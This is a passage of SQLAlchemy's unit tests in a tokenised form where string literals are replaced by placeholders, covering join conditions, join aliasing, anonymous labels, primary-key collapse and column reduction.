c <EOL> def test_union_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = select ( [ a ] ) <EOL> s2 = select ( [ a ] ) <EOL> s3 = s1 . union ( s2 ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> s3 . _refresh_for_new_column ( q ) <EOL> assert a . c . q in s3 . c . q . proxy_set <EOL> def test_union_init_raises ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> s1 = select ( [ a ] ) <EOL> s2 = select ( [ a ] ) <EOL> s3 = s1 . union ( s2 ) <EOL> s3 . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> a . append_column ( q ) <EOL> assert_raises_message ( <EOL> NotImplementedError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> s3 . _refresh_for_new_column , q <EOL> ) <EOL> def test_nested_join_uninit ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) . join ( c , b . c . y == c . c . z ) <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> def test_nested_join_init ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:x>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:y>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:z>' ) ) <EOL> j = a . join ( b , a . c . x == b . c . y ) . join ( c , b . c . y == c . c . z ) <EOL> j . c <EOL> q = column ( '<STR_LIT:q>' ) <EOL> b . append_column ( q ) <EOL> j . _refresh_for_new_column ( q ) <EOL> assert j . c . b_q is q <EOL> class AnonLabelTest ( fixtures . TestBase ) : <EOL> """<STR_LIT>""" <EOL> def test_anon_labels_named_column ( self ) : <EOL> c1 = column ( '<STR_LIT:x>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 . 
label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_anon_labels_literal_column ( self ) : <EOL> c1 = literal_column ( '<STR_LIT:x>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 . label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_anon_labels_func ( self ) : <EOL> c1 = func . count ( '<STR_LIT:*>' ) <EOL> assert c1 . label ( None ) is not c1 <EOL> eq_ ( str ( select ( [ c1 ] ) ) , "<STR_LIT>" ) <EOL> c2 = select ( [ c1 ] ) . compile ( ) <EOL> eq_ ( str ( select ( [ c1 . label ( None ) ] ) ) , "<STR_LIT>" ) <EOL> def test_named_labels_named_column ( self ) : <EOL> c1 = column ( '<STR_LIT:x>' ) <EOL> eq_ ( str ( select ( [ c1 . label ( '<STR_LIT:y>' ) ] ) ) , "<STR_LIT>" ) <EOL> def test_named_labels_literal_column ( self ) : <EOL> c1 = literal_column ( '<STR_LIT:x>' ) <EOL> eq_ ( str ( select ( [ c1 . label ( '<STR_LIT:y>' ) ] ) ) , "<STR_LIT>" ) <EOL> class JoinAliasingTest ( fixtures . TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_flat_ok_on_non_join ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> s = a . select ( ) <EOL> self . assert_compile ( <EOL> s . alias ( flat = True ) . select ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> a . join ( b , a . c . a == b . c . b ) . alias ( ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_standalone_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> alias ( a . join ( b , a . c . a == b . c . b ) ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . 
assert_compile ( <EOL> a . join ( b , a . c . a == b . c . b ) . alias ( flat = True ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_join_standalone_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> self . assert_compile ( <EOL> alias ( a . join ( b , a . c . a == b . c . b ) , flat = True ) , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_composed_join_alias_flat ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:c>' ) ) <EOL> d = table ( '<STR_LIT:d>' , column ( '<STR_LIT:d>' ) ) <EOL> j1 = a . join ( b , a . c . a == b . c . b ) <EOL> j2 = c . join ( d , c . c . c == d . c . d ) <EOL> self . assert_compile ( <EOL> j1 . join ( j2 , b . c . b == c . c . c ) . alias ( flat = True ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_composed_join_alias ( self ) : <EOL> a = table ( '<STR_LIT:a>' , column ( '<STR_LIT:a>' ) ) <EOL> b = table ( '<STR_LIT:b>' , column ( '<STR_LIT:b>' ) ) <EOL> c = table ( '<STR_LIT:c>' , column ( '<STR_LIT:c>' ) ) <EOL> d = table ( '<STR_LIT:d>' , column ( '<STR_LIT:d>' ) ) <EOL> j1 = a . join ( b , a . c . a == b . c . b ) <EOL> j2 = c . join ( d , c . c . c == d . c . d ) <EOL> self . assert_compile ( <EOL> select ( [ j1 . join ( j2 , b . c . b == c . c . c ) . alias ( ) ] ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> class JoinConditionTest ( fixtures . 
TestBase , AssertsCompiledSQL ) : <EOL> __dialect__ = '<STR_LIT:default>' <EOL> def test_join_condition ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t3 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t4 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t5 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT>' , ForeignKey ( '<STR_LIT>' ) ) , <EOL> ) <EOL> t1t2 = t1 . join ( t2 ) <EOL> t2t3 = t2 . join ( t3 ) <EOL> for ( left , right , a_subset , expected ) in [ <EOL> ( t1 , t2 , None , t1 . c . id == t2 . c . t1id ) , <EOL> ( t1t2 , t3 , t2 , t1t2 . c . t2_id == t3 . c . t2id ) , <EOL> ( t2t3 , t1 , t3 , t1 . c . id == t3 . c . t1id ) , <EOL> ( t2t3 , t4 , None , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 , t4 , t3 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , None , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t1 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t1t2 , t2t3 , t2 , t1t2 . c . t2_id == t2t3 . c . t3_t2id ) , <EOL> ] : <EOL> assert expected . compare ( <EOL> sql_util . join_condition ( <EOL> left , <EOL> right , <EOL> a_subset = a_subset ) ) <EOL> for left , right , a_subset in [ <EOL> ( t1t2 , t3 , None ) , <EOL> ( t2t3 , t1 , None ) , <EOL> ( t1 , t4 , None ) , <EOL> ( t1t2 , t2t3 , None ) , <EOL> ( t5 , t1 , None ) , <EOL> ( t5 . select ( use_labels = True ) , t1 , None ) <EOL> ] : <EOL> assert_raises ( <EOL> exc . ArgumentError , <EOL> sql_util . 
join_condition , <EOL> left , right , a_subset = a_subset <EOL> ) <EOL> als = t2t3 . alias ( ) <EOL> for left , right , expected in [ <EOL> ( t1 , t2 , t1 . c . id == t2 . c . t1id ) , <EOL> ( t1t2 , t3 , t1t2 . c . t2_id == t3 . c . t2id ) , <EOL> ( t2t3 , t1 , t1 . c . id == t3 . c . t1id ) , <EOL> ( t2t3 , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t2t3 . join ( t1 ) , t4 , t2t3 . c . t2_id == t4 . c . t2id ) , <EOL> ( t1t2 , als , t1t2 . c . t2_id == als . c . t3_t2id ) <EOL> ] : <EOL> assert expected . compare ( <EOL> left . join ( right ) . onclause <EOL> ) <EOL> j = t1t2 . join ( t2t3 ) <EOL> assert j . onclause . compare ( t2 . c . id == t3 . c . t2id ) <EOL> self . assert_compile ( <EOL> j , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> st2t3 = t2t3 . select ( use_labels = True ) <EOL> j = t1t2 . join ( st2t3 ) <EOL> assert j . onclause . compare ( t2 . c . id == st2t3 . c . t3_t2id ) <EOL> self . assert_compile ( <EOL> j , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_join_multiple_equiv_fks ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) <EOL> ) <EOL> t2 = Table ( <EOL> '<STR_LIT>' , <EOL> m , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> ForeignKey ( '<STR_LIT>' ) ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . id == t2 . c . 
t1id ) <EOL> def test_join_cond_no_such_unrelated_table ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , <EOL> Column ( '<STR_LIT:y>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> assert sql_util . join_condition ( t2 , t1 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> def test_join_cond_no_such_unrelated_column ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:y>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert sql_util . join_condition ( t1 , t2 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> assert sql_util . join_condition ( t2 , t1 ) . compare ( t1 . c . x == t2 . c . id ) <EOL> def test_join_cond_no_such_related_table ( self ) : <EOL> m1 = MetaData ( ) <EOL> m2 = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m1 , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m2 , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedTableError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t1 , t2 <EOL> ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedTableError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . 
join_condition , t2 , t1 <EOL> ) <EOL> def test_join_cond_no_such_related_column ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:id>' , Integer ) ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedColumnError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t1 , t2 <EOL> ) <EOL> assert_raises_message ( <EOL> exc . NoReferencedColumnError , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> sql_util . join_condition , t2 , t1 <EOL> ) <EOL> class PrimaryKeyTest ( fixtures . TestBase , AssertsExecutionResults ) : <EOL> def test_join_pk_collapse_implicit ( self ) : <EOL> """<STR_LIT>""" <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , Column ( '<STR_LIT:id>' , Integer , primary_key = True ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> c = Table ( '<STR_LIT:c>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> d = Table ( '<STR_LIT:d>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> assert c . c . id . references ( b . c . id ) <EOL> assert not d . c . id . references ( a . c . id ) <EOL> assert list ( a . join ( b ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( d . join ( c ) . join ( b ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c ) . join ( d ) . primary_key ) == [ a . c . 
id ] <EOL> def test_join_pk_collapse_explicit ( self ) : <EOL> """<STR_LIT>""" <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> c = Table ( '<STR_LIT:c>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> d = Table ( '<STR_LIT:d>' , meta , Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , Column ( '<STR_LIT:x>' , Integer ) ) <EOL> print ( list ( a . join ( b , a . c . x == b . c . id ) . primary_key ) ) <EOL> assert list ( a . join ( b , a . c . x == b . c . id ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c , b . c . x == c . c . id ) . primary_key ) == [ b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c , c . c . id == b . c . x ) . primary_key ) == [ a . c . id ] <EOL> assert list ( b . join ( c , c . c . x == b . c . id ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( b . join ( c , c . c . id == b . c . x ) . join ( d ) . primary_key ) == [ b . c . id ] <EOL> assert list ( <EOL> d . join ( <EOL> b , <EOL> d . c . id == b . c . id ) . join ( <EOL> c , <EOL> b . c . id == c . c . x ) . primary_key ) == [ <EOL> b . c . id ] <EOL> assert list ( a . join ( b ) . join ( c , c . c . id <EOL> == b . c . x ) . join ( d ) . primary_key ) == [ a . c . id ] <EOL> assert list ( a . join ( b , and_ ( a . c . id == b . c . id , a . c . x <EOL> == b . c . id ) ) . primary_key ) == [ a . c . 
id ] <EOL> def test_init_doesnt_blowitaway ( self ) : <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> j = a . join ( b ) <EOL> assert list ( j . primary_key ) == [ a . c . id ] <EOL> j . foreign_keys <EOL> assert list ( j . primary_key ) == [ a . c . id ] <EOL> def test_non_column_clause ( self ) : <EOL> meta = MetaData ( ) <EOL> a = Table ( '<STR_LIT:a>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer ) ) <EOL> b = Table ( '<STR_LIT:b>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:x>' , Integer , primary_key = True ) ) <EOL> j = a . join ( b , and_ ( a . c . id == b . c . id , b . c . x == <NUM_LIT:5> ) ) <EOL> assert str ( j ) == "<STR_LIT>" , str ( j ) <EOL> assert list ( j . primary_key ) == [ a . c . id , b . c . x ] <EOL> def test_onclause_direction ( self ) : <EOL> metadata = MetaData ( ) <EOL> employee = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:100> ) ) , <EOL> Column ( '<STR_LIT:id>' , Integer , primary_key = True ) , <EOL> ) <EOL> engineer = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT:id>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , primary_key = True ) ) <EOL> eq_ ( util . column_set ( employee . join ( engineer , employee . c . id <EOL> == engineer . c . id ) . primary_key ) , <EOL> util . column_set ( [ employee . c . id ] ) ) <EOL> eq_ ( util . column_set ( employee . join ( engineer , engineer . c . id <EOL> == employee . c . id ) . primary_key ) , <EOL> util . column_set ( [ employee . c . id ] ) ) <EOL> class ReduceTest ( fixtures . 
TestBase , AssertsExecutionResults ) : <EOL> def test_reduce ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:30> ) ) ) <EOL> t2 = Table ( <EOL> '<STR_LIT>' , <EOL> meta , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> String ( <NUM_LIT:30> ) ) ) <EOL> t3 = Table ( <EOL> '<STR_LIT>' , <EOL> meta , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> String ( <NUM_LIT:30> ) ) ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ <EOL> t1 . c . t1id , <EOL> t1 . c . t1data , <EOL> t2 . c . t2id , <EOL> t2 . c . t2data , <EOL> t3 . c . t3id , <EOL> t3 . c . t3data , <EOL> ] ) ) , util . column_set ( [ t1 . c . t1id , t1 . c . t1data , t2 . c . t2data , <EOL> t3 . c . t3data ] ) ) <EOL> def test_reduce_selectable ( self ) : <EOL> metadata = MetaData ( ) <EOL> engineers = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> managers = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> s = select ( [ engineers , <EOL> managers ] ) . where ( engineers . c . engineer_name <EOL> == managers . c . manager_name ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( list ( s . c ) , s ) ) , <EOL> util . column_set ( [ s . c . engineer_id , s . c . engineer_name , <EOL> s . c . 
manager_id ] ) ) <EOL> def test_reduce_generation ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:z>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer ) ) <EOL> s1 = select ( [ t1 , t2 ] ) <EOL> s2 = s1 . reduce_columns ( only_synonyms = False ) <EOL> eq_ ( <EOL> set ( s2 . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t2 . c . q ] ) <EOL> ) <EOL> s2 = s1 . reduce_columns ( ) <EOL> eq_ ( <EOL> set ( s2 . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t2 . c . z , t2 . c . q ] ) <EOL> ) <EOL> def test_reduce_only_synonym_fk ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) ) <EOL> t2 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , ForeignKey ( '<STR_LIT>' ) ) , <EOL> Column ( '<STR_LIT:q>' , Integer , ForeignKey ( '<STR_LIT>' ) ) ) <EOL> s1 = select ( [ t1 , t2 ] ) <EOL> s1 = s1 . reduce_columns ( only_synonyms = True ) <EOL> eq_ ( <EOL> set ( s1 . c ) , <EOL> set ( [ s1 . c . x , s1 . c . y , s1 . c . q ] ) <EOL> ) <EOL> def test_reduce_only_synonym_lineage ( self ) : <EOL> m = MetaData ( ) <EOL> t1 = Table ( '<STR_LIT>' , m , Column ( '<STR_LIT:x>' , Integer , primary_key = True ) , <EOL> Column ( '<STR_LIT:y>' , Integer ) , <EOL> Column ( '<STR_LIT:z>' , Integer ) <EOL> ) <EOL> s1 = select ( [ t1 ] ) <EOL> s2 = select ( [ t1 , s1 ] ) . where ( t1 . c . x == s1 . c . x ) . where ( s1 . c . y == t1 . c . z ) <EOL> eq_ ( <EOL> set ( s2 . reduce_columns ( ) . inner_columns ) , <EOL> set ( [ t1 . c . x , t1 . c . y , t1 . c . z , s1 . c . y , s1 . c . z ] ) <EOL> ) <EOL> s1 = select ( [ t1 ] ) <EOL> s2 = select ( [ s1 , t1 ] ) . where ( t1 . c . x == s1 . c . x ) . where ( s1 . c . y == t1 . c . 
z ) <EOL> eq_ ( <EOL> set ( s2 . reduce_columns ( ) . inner_columns ) , <EOL> set ( [ s1 . c . x , t1 . c . y , t1 . c . z , s1 . c . y , s1 . c . z ] ) <EOL> ) <EOL> def test_reduce_aliased_join ( self ) : <EOL> metadata = MetaData ( ) <EOL> people = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT>' , Integer , Sequence ( <EOL> '<STR_LIT>' , optional = True ) , primary_key = True ) , Column ( <EOL> '<STR_LIT:name>' , String ( <NUM_LIT:50> ) ) , Column ( <EOL> '<STR_LIT:type>' , String ( <NUM_LIT:30> ) ) ) <EOL> engineers = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' <EOL> ) , primary_key = True ) , <EOL> Column ( '<STR_LIT:status>' , String ( <NUM_LIT:30> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:50> ) ) , <EOL> ) <EOL> managers = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT>' , Integer , ForeignKey ( '<STR_LIT>' ) , primary_key = True ) , Column ( <EOL> '<STR_LIT:status>' , String ( <NUM_LIT:30> ) ) , Column ( <EOL> '<STR_LIT>' , String ( <NUM_LIT:50> ) ) ) <EOL> pjoin = people . outerjoin ( engineers ) . outerjoin ( managers ) . select ( use_labels = True ) . alias ( '<STR_LIT>' <EOL> ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ pjoin . c . people_person_id , <EOL> pjoin . c . engineers_person_id , <EOL> pjoin . c . managers_person_id ] ) ) , <EOL> util . column_set ( [ pjoin . c . 
people_person_id ] ) ) <EOL> def test_reduce_aliased_union ( self ) : <EOL> metadata = MetaData ( ) <EOL> item_table = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( <EOL> '<STR_LIT:id>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> default = <NUM_LIT:0> ) ) <EOL> base_item_table = Table ( <EOL> '<STR_LIT>' , metadata , Column ( <EOL> '<STR_LIT:id>' , Integer , primary_key = True ) , Column ( <EOL> '<STR_LIT>' , String ( <NUM_LIT:255> ) , default = None ) ) <EOL> from sqlalchemy . orm . util import polymorphic_union <EOL> item_join = polymorphic_union ( { <EOL> '<STR_LIT>' : <EOL> base_item_table . select ( <EOL> base_item_table . c . child_name <EOL> == '<STR_LIT>' ) , <EOL> '<STR_LIT>' : base_item_table . join ( item_table ) } , <EOL> None , '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( [ item_join . c . id , <EOL> item_join . c . dummy , <EOL> item_join . c . child_name ] ) ) , <EOL> util . column_set ( [ item_join . c . id , <EOL> item_join . c . dummy , <EOL> item_join . c . child_name ] ) ) <EOL> def test_reduce_aliased_union_2 ( self ) : <EOL> metadata = MetaData ( ) <EOL> page_table = Table ( '<STR_LIT>' , metadata , Column ( '<STR_LIT:id>' , Integer , <EOL> primary_key = True ) ) <EOL> magazine_page_table = Table ( '<STR_LIT>' , metadata , <EOL> Column ( '<STR_LIT>' , Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> classified_page_table = Table ( <EOL> '<STR_LIT>' , <EOL> metadata , <EOL> Column ( <EOL> '<STR_LIT>' , <EOL> Integer , <EOL> ForeignKey ( '<STR_LIT>' ) , <EOL> primary_key = True ) ) <EOL> pjoin = union ( <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> classified_page_table . c . magazine_page_id <EOL> ] ) . <EOL> select_from ( <EOL> page_table . join ( magazine_page_table ) . 
<EOL> join ( classified_page_table ) ) , <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> cast ( null ( ) , Integer ) . label ( '<STR_LIT>' ) <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) ) <EOL> ) . alias ( '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( <EOL> [ pjoin . c . id , pjoin . c . page_id , pjoin . c . magazine_page_id ] ) ) , util . column_set ( [ pjoin . c . id ] ) ) <EOL> pjoin = union ( select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> cast ( null ( ) , Integer ) . label ( '<STR_LIT>' ) <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) ) , <EOL> select ( [ <EOL> page_table . c . id , <EOL> magazine_page_table . c . page_id , <EOL> classified_page_table . c . magazine_page_id <EOL> ] ) . <EOL> select_from ( page_table . join ( magazine_page_table ) . <EOL> join ( classified_page_table ) ) <EOL> ) . alias ( '<STR_LIT>' ) <EOL> eq_ ( util . column_set ( sql_util . reduce_columns ( <EOL> [ pjoin . c . id , pjoin . c . page_id , pjoin . c . magazine_page_id ] ) ) , util . column_set ( [ pjoin . c . id ] ) ) <EOL> class DerivedTest ( fixtures . TestBase , AssertsExecutionResults ) : <EOL> def test_table ( self ) : <EOL> meta = MetaData ( ) <EOL> t1 = Table ( 